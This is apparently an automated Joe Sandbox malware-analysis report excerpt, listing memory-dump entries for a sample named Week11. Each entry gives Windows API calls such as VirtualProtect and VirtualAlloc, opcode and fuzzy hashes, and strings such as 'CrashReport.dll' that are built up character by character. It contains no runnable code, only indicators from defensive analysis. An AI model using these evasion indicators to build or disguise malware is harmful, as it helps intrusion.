                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: >D:J
                                • API String ID: 2949231068-4119004005
                                • Opcode ID: f9f29053a3712a680da968405da0076c97354cb03f8aae6b45cf2221506d55a3
                                • Instruction ID: 87f3a9b5aa80160d050a753c72d5f6b7cfc327e9bc981b88158256262f9f7d3b
                                • Opcode Fuzzy Hash: f9f29053a3712a680da968405da0076c97354cb03f8aae6b45cf2221506d55a3
                                • Instruction Fuzzy Hash: 8981E0B1C083699FDB24CB24CC907EABBB4EF45310F1441EAD949A7241E6398EC6CF56
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: >D:J
                                • API String ID: 2949231068-4119004005
                                • Opcode ID: 0a2b48b2754764588b80c28af891b769f17cbbac81dd9203c2304fd673f900b8
                                • Instruction ID: eed724c50ca4fe5c5fa6ffd5a7f16ed8747731d8aa71036cf8de9cba42c802bf
                                • Opcode Fuzzy Hash: 0a2b48b2754764588b80c28af891b769f17cbbac81dd9203c2304fd673f900b8
                                • Instruction Fuzzy Hash: A88116B1C083699BDB208B21CC907FA7BB5FF45310F1445EAD84DA7281E6388EC6CB56
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: I@JA
                                • API String ID: 2949231068-3163526114
                                • Opcode ID: b4bcd7b9c3bae49e00fc71c9ee72fda82ddda9d7847e827acb069b376990abcf
                                • Instruction ID: 06b353535dcdc859f0034f7b559fc19347504739200407afbfc489a7606d802f
                                • Opcode Fuzzy Hash: b4bcd7b9c3bae49e00fc71c9ee72fda82ddda9d7847e827acb069b376990abcf
                                • Instruction Fuzzy Hash: 852149F2D085686BE3248B25DC54BE77B78EF11320F1900FAD94996541E23C9AC68FA2
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 5a3031c958d47cde5423dd111f999a9b881f198710d62490f9b85713a9b15fcc
                                • Instruction ID: f2660a84a9785de92d6c4179d1ea05aee36040fdd5cdfb55622016ef69124e4c
                                • Opcode Fuzzy Hash: 5a3031c958d47cde5423dd111f999a9b881f198710d62490f9b85713a9b15fcc
                                • Instruction Fuzzy Hash: 9712C2B1D042289BEB248B14DD90BEAB7B5EB85310F1581FAD84D56640D738AFC2CF95
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 97bab8264f287768de0b2093433d6d5173df51ab0203acf61cbd534e65563103
                                • Instruction ID: 9548006abfd6f51041c3fc3b8b5cb9dce147eeb380a758c0b6e7585f7c973d26
                                • Opcode Fuzzy Hash: 97bab8264f287768de0b2093433d6d5173df51ab0203acf61cbd534e65563103
                                • Instruction Fuzzy Hash: FCE17CB5D08668CFEB24CB14DC90BEAB7B5FF84304F1481EAD80DA6241D6786EC68F55
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: d02776d87926c49c3a205901e74d72355ed4ddbe3465c53d52234269d0351399
                                • Instruction ID: 3df9888577b18123dd39ea62242d633e8315d7f160ccfc61a4e9d6eb8b90d62a
                                • Opcode Fuzzy Hash: d02776d87926c49c3a205901e74d72355ed4ddbe3465c53d52234269d0351399
                                • Instruction Fuzzy Hash: 6F21F6B1D085999BD720CB15CC90BEBBBB4FF46310F1881EAD88997642D2385AC6CF52
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 9d6fd4aa9e04aab29d42247b339925ea5cf3aa601b34c3a9c3dcde2bb8b7dff7
                                • Instruction ID: fa18beae47fcdfa1cd365837ec87f141bfd18453a3f180c476c69577d8581926
                                • Opcode Fuzzy Hash: 9d6fd4aa9e04aab29d42247b339925ea5cf3aa601b34c3a9c3dcde2bb8b7dff7
                                • Instruction Fuzzy Hash: 7D21C7B1D086999FDB20CB14CC907EABBB4FF46314F1441EAD88997641E2385EC6CF52
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 1483383765f1cfd51dcce7d230b2c17b66b595a48f1c50d2a0b1735e8012bb66
                                • Instruction ID: f398059b22583b82b339f0c3e3e8fbf34d72fffc4ee610571627a6a97187914e
                                • Opcode Fuzzy Hash: 1483383765f1cfd51dcce7d230b2c17b66b595a48f1c50d2a0b1735e8012bb66
                                • Instruction Fuzzy Hash: 84113AF1D0C2949FE7108B25DC90BE67B78EF42310F1980FFD94886542D23C9AC68B52
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417517
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 5174a2dd9217f9427674ceb0c2f3f3c1d7a42abe70441ef0711f9bf011556f77
                                • Instruction ID: a9473657e0555dd9abd3046f59b2817e3b0620f52b60ee51d76898ed3679e195
                                • Opcode Fuzzy Hash: 5174a2dd9217f9427674ceb0c2f3f3c1d7a42abe70441ef0711f9bf011556f77
                                • Instruction Fuzzy Hash: 20112CB2C486999FD3108B25DC907E77BB8EF11314F1901FAC889C6542D13D9AC6CF92
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 83dda0267fe6caebd37a7546cbe13cdd92656f67d7c5b6635a846884c4297c32
                                • Instruction ID: 390ed91ab8c7184ca9a65bb72a4321b19e25c97645b9654796fd61a692fd19ff
                                • Opcode Fuzzy Hash: 83dda0267fe6caebd37a7546cbe13cdd92656f67d7c5b6635a846884c4297c32
                                • Instruction Fuzzy Hash: 4481CEB1D042289BEB248B14DC44BEAB775EF84314F1481FAD90E67340E6786EC1CB96
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: 5G4;$CrashReport.dll$E$L$L$P$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 544645111-4288462540
                                • Opcode ID: 8b030d8ccd3c56a9741b341e49698a41a4d30c31955fb75d3503bbddd02aed3f
                                • Instruction ID: 3e6c72d367cace4b820deff05f12ccec4477c1f771b2cdc57d925e70083604ae
                                • Opcode Fuzzy Hash: 8b030d8ccd3c56a9741b341e49698a41a4d30c31955fb75d3503bbddd02aed3f
                                • Instruction Fuzzy Hash: A2910471E092A48EFB20C624DC447EABBB1AF91310F0480FAD44C9B282D77E5BC4CB56
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: =E8K$CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-4241551058
                                • Opcode ID: c4353d701fb51a2b0dffa6dd4f7b989e43846d7ef29b9452b8486dfea5942382
                                • Instruction ID: cb0166366334f97fd20b34c2e59fcc0f862cad035518c17975269d7935fb6a3f
                                • Opcode Fuzzy Hash: c4353d701fb51a2b0dffa6dd4f7b989e43846d7ef29b9452b8486dfea5942382
                                • Instruction Fuzzy Hash: DD5108B1E042A49EFB20DB25DC547EAB6B5AF91304F0480FAD44C97241D67D4FC18F96
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: 76d439da0879468c9b90526ccdbc8294a3ff9deeca0538f3feaac66b2afd6268
                                • Instruction ID: b74b1b957882d4cf87e958b115efe91b1eaeb00401719a61d1ad3de12e208e10
                                • Opcode Fuzzy Hash: 76d439da0879468c9b90526ccdbc8294a3ff9deeca0538f3feaac66b2afd6268
                                • Instruction Fuzzy Hash: 34A103B2E052A49AEB20CB25DC547EAB6B5EF95300F0480FAD44CAB281D6794FC5CF56
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: 2ed099ac01734b5839e9fecc942af504e580af99a8cccfc6d444e26b65da47eb
                                • Instruction ID: 29f02d2925a9bbc4b1f9ed4a27b07f14be42d4a8db89c225359a38322e303326
                                • Opcode Fuzzy Hash: 2ed099ac01734b5839e9fecc942af504e580af99a8cccfc6d444e26b65da47eb
                                • Instruction Fuzzy Hash: F891EEB1E052649FF720CA24DC54BEAB6B5EF94300F0480FAD84C9B281D6799FC18F96
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: a40f5c731d3bbbdafb78bfce8f8c0af5b80b1a62c81510cc8b871dc4e5413caf
                                • Instruction ID: dcb01827e1df5beca015379fd467e3d6e7a4c1b7451d90e6054152a7368343a1
                                • Opcode Fuzzy Hash: a40f5c731d3bbbdafb78bfce8f8c0af5b80b1a62c81510cc8b871dc4e5413caf
                                • Instruction Fuzzy Hash: 4261F5B2E052949EFB208A25DC447EB7AB5EF91314F0480FAD44C97281D67D4FC5CB56
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: c03d5b0dc5baddca9ba271c35949d28475151da9e72dc3d2ea4d164f164e34c8
                                • Instruction ID: 35e67c8a3b59b558272e75e3fc67bdbc3abb9c3060591f435ef62cb8cd9b40e9
                                • Opcode Fuzzy Hash: c03d5b0dc5baddca9ba271c35949d28475151da9e72dc3d2ea4d164f164e34c8
                                • Instruction Fuzzy Hash: 1C71E0B1E052A49EFB20CA24DC547EAB6B5EF95300F0480FAD44CA7681D67E5FC18F96
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: 04534ad2945eb12c74019af85e0bd98c4f6d1aade11cb0dce868b4636e19a1d1
                                • Instruction ID: 34df4aaa802723cd7e0851bb1c3307afecb9022a14f89e524a76bc45b46afdb8
                                • Opcode Fuzzy Hash: 04534ad2945eb12c74019af85e0bd98c4f6d1aade11cb0dce868b4636e19a1d1
                                • Instruction Fuzzy Hash: EE71E471E052A88EFB20CB25DC547EABAB1AF51304F0480EED44DA7291DA795FC08F96
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: bd841f4c8c3fa8e1de907a16782fa932cfd63a91ed947f5473c4a09782829677
                                • Instruction ID: c348faedcfdbc602bb63cd66dbf8fa8f02ce3145a13d1d8bb1fc73d402f7a07b
                                • Opcode Fuzzy Hash: bd841f4c8c3fa8e1de907a16782fa932cfd63a91ed947f5473c4a09782829677
